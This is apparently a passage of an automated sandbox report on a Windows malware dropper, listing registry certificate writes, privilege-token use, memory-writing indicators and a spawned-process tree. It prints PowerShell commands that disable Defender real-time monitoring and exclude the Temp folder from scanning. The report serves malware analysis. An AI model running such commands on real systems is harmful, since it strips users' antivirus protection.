5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 chenxiulan-game.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 chenxiulan-game.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 chenxiulan-game.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD chenxiulan-game.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeSat0188dba58af938.exeTalchhTbcf9uDUc0xiJ5zu20.exepid process 2644 powershell.exe 2644 powershell.exe 3404 powershell.exe 3404 powershell.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 3388 TalchhTbcf9uDUc0xiJ5zu20.exe 720 Sat0188dba58af938.exe 720 Sat0188dba58af938.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Explorer.EXEfoldershare.exepid process 3196 Explorer.EXE 6696 foldershare.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
Processes:
CHjg5Y_u54NbfvxUap_GN9hB.exe13bpu9cGZVQ3bQBYByHDZulD.exe3092977.exewscript.exe1067.exepid process 3152 CHjg5Y_u54NbfvxUap_GN9hB.exe 4200 13bpu9cGZVQ3bQBYByHDZulD.exe 4200 13bpu9cGZVQ3bQBYByHDZulD.exe 4200 13bpu9cGZVQ3bQBYByHDZulD.exe 3152 CHjg5Y_u54NbfvxUap_GN9hB.exe 3152 CHjg5Y_u54NbfvxUap_GN9hB.exe 5144 3092977.exe 6832 wscript.exe 6832 wscript.exe 6832 wscript.exe 6832 wscript.exe 5476 1067.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes:
msedge.exepid process 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe 5592 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
7203627.exepid process 1336 7203627.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exeSat01e3b3e0fa80800c.exesvchost.exezAxe7U5Ivhp5NRRY4S8viu_q.exepowershell.exeSat01c5002407.exepowershell.exetaskkill.exeDownFlSetup110.exe1067.exe5.exedescription pid process Token: SeShutdownPrivilege 1704 svchost.exe Token: SeCreatePagefilePrivilege 1704 svchost.exe Token: SeShutdownPrivilege 1704 svchost.exe Token: SeCreatePagefilePrivilege 1704 svchost.exe Token: SeShutdownPrivilege 1704 svchost.exe Token: SeCreatePagefilePrivilege 1704 svchost.exe Token: SeCreateTokenPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeAssignPrimaryTokenPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeLockMemoryPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeIncreaseQuotaPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeMachineAccountPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeTcbPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeSecurityPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeTakeOwnershipPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeLoadDriverPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeSystemProfilePrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeSystemtimePrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeProfSingleProcessPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeIncBasePriorityPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeCreatePagefilePrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeCreatePermanentPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeBackupPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeRestorePrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeShutdownPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeDebugPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeAuditPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeSystemEnvironmentPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeChangeNotifyPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeRemoteShutdownPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeUndockPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeSyncAgentPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeEnableDelegationPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeManageVolumePrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeImpersonatePrivilege 1596 Sat01e3b3e0fa80800c.exe Token: SeCreateGlobalPrivilege 1596 Sat01e3b3e0fa80800c.exe Token: 31 1596 Sat01e3b3e0fa80800c.exe Token: 32 1596 Sat01e3b3e0fa80800c.exe Token: 33 1596 Sat01e3b3e0fa80800c.exe Token: 34 1596 Sat01e3b3e0fa80800c.exe Token: 35 1596 Sat01e3b3e0fa80800c.exe Token: SeShutdownPrivilege 4448 svchost.exe Token: SeCreatePagefilePrivilege 4448 svchost.exe Token: SeDebugPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 852 Sat01c5002407.exe Token: SeDebugPrivilege 3404 powershell.exe Token: SeDebugPrivilege 5312 taskkill.exe Token: SeDebugPrivilege 5652 DownFlSetup110.exe Token: SeDebugPrivilege 5964 1067.exe Token: SeDebugPrivilege 6136 5.exe Token: SeCreateTokenPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeAssignPrimaryTokenPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeLockMemoryPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeIncreaseQuotaPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeMachineAccountPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeTcbPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeSecurityPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeTakeOwnershipPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeLoadDriverPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeSystemProfilePrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeSystemtimePrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeProfSingleProcessPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeIncBasePriorityPrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe Token: SeCreatePagefilePrivilege 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
Sat018ad0a25a7faa.tmpsetting.exemsedge.exeinstaller.exeCalculator.exepid process 3336 Sat018ad0a25a7faa.tmp 8368 setting.exe 5592 msedge.exe 9392 installer.exe 14652 Calculator.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3196 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4340 wrote to memory of 428 4340 setup_x86_x64_install.exe setup_installer.exe PID 4340 wrote to memory of 428 4340 setup_x86_x64_install.exe setup_installer.exe PID 4340 wrote to memory of 428 4340 setup_x86_x64_install.exe setup_installer.exe PID 428 wrote to memory of 1448 428 setup_installer.exe setup_install.exe PID 428 wrote to memory of 1448 428 setup_installer.exe setup_install.exe PID 428 wrote to memory of 1448 428 setup_installer.exe setup_install.exe PID 1448 wrote to memory of 1592 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 1592 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 1592 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 1552 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 1552 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 1552 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4980 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4980 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4980 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2032 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2032 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2032 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2148 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2148 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2148 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 444 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 444 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 444 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2176 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2176 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2176 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2244 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2244 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 2244 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 5024 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 5024 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 5024 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4388 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4388 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4388 1448 setup_install.exe cmd.exe PID 1592 wrote to memory of 2644 1592 cmd.exe powershell.exe PID 1592 wrote to memory of 2644 1592 cmd.exe powershell.exe PID 1592 wrote to memory of 2644 1592 cmd.exe powershell.exe PID 1552 wrote to memory of 3404 1552 cmd.exe powershell.exe PID 1552 wrote to memory of 3404 1552 cmd.exe powershell.exe PID 1552 wrote to memory of 3404 1552 cmd.exe powershell.exe PID 2032 wrote to memory of 5012 2032 cmd.exe Sat01866e4ba0024d.exe PID 2032 wrote to memory of 5012 2032 cmd.exe Sat01866e4ba0024d.exe PID 2032 wrote to memory of 5012 2032 cmd.exe Sat01866e4ba0024d.exe PID 1448 wrote to memory of 3060 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 3060 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 3060 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 3684 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 3684 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 3684 1448 setup_install.exe cmd.exe PID 4980 wrote to memory of 3388 4980 cmd.exe Sat016e74da9cbf1.exe PID 4980 wrote to memory of 3388 4980 cmd.exe Sat016e74da9cbf1.exe PID 4980 wrote to memory of 3388 4980 cmd.exe Sat016e74da9cbf1.exe PID 1448 wrote to memory of 4284 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4284 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4284 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4200 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4200 1448 setup_install.exe cmd.exe PID 1448 wrote to memory of 4200 1448 setup_install.exe cmd.exe PID 2244 wrote to memory of 4384 2244 cmd.exe Sat01d42d6cf82db.exe PID 2244 wrote to memory of 4384 2244 cmd.exe Sat01d42d6cf82db.exe PID 2244 wrote to memory of 4384 2244 cmd.exe Sat01d42d6cf82db.exe PID 2176 wrote to memory of 720 2176 cmd.exe Sat0188dba58af938.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer wscript.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat016e74da9cbf1.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat016e74da9cbf1.exeSat016e74da9cbf1.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\lvJ1Y9rsF3mHa5_BNzaFz0_L.exe"C:\Users\Admin\Pictures\Adobe Films\lvJ1Y9rsF3mHa5_BNzaFz0_L.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\lgn2jnMR3V1GyJteBmyhVbIn.exe"C:\Users\Admin\Pictures\Adobe Films\lgn2jnMR3V1GyJteBmyhVbIn.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\JYyzD3uRfkIA4VGE11yIZZQJ.exe"C:\Users\Admin\Documents\JYyzD3uRfkIA4VGE11yIZZQJ.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\TalchhTbcf9uDUc0xiJ5zu20.exe"C:\Users\Admin\Pictures\Adobe Films\TalchhTbcf9uDUc0xiJ5zu20.exe"9⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\VSEpxIrnTzVwh6FUu92XjrEG.exe"C:\Users\Admin\Pictures\Adobe Films\VSEpxIrnTzVwh6FUu92XjrEG.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 24010⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\1CAHrufhJbYSm8quK5_Pt3Hd.exe"C:\Users\Admin\Pictures\Adobe Films\1CAHrufhJbYSm8quK5_Pt3Hd.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\tQHJh4kJi8M3Hs2e9XPGcZue.exe"C:\Users\Admin\Pictures\Adobe Films\tQHJh4kJi8M3Hs2e9XPGcZue.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 173210⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
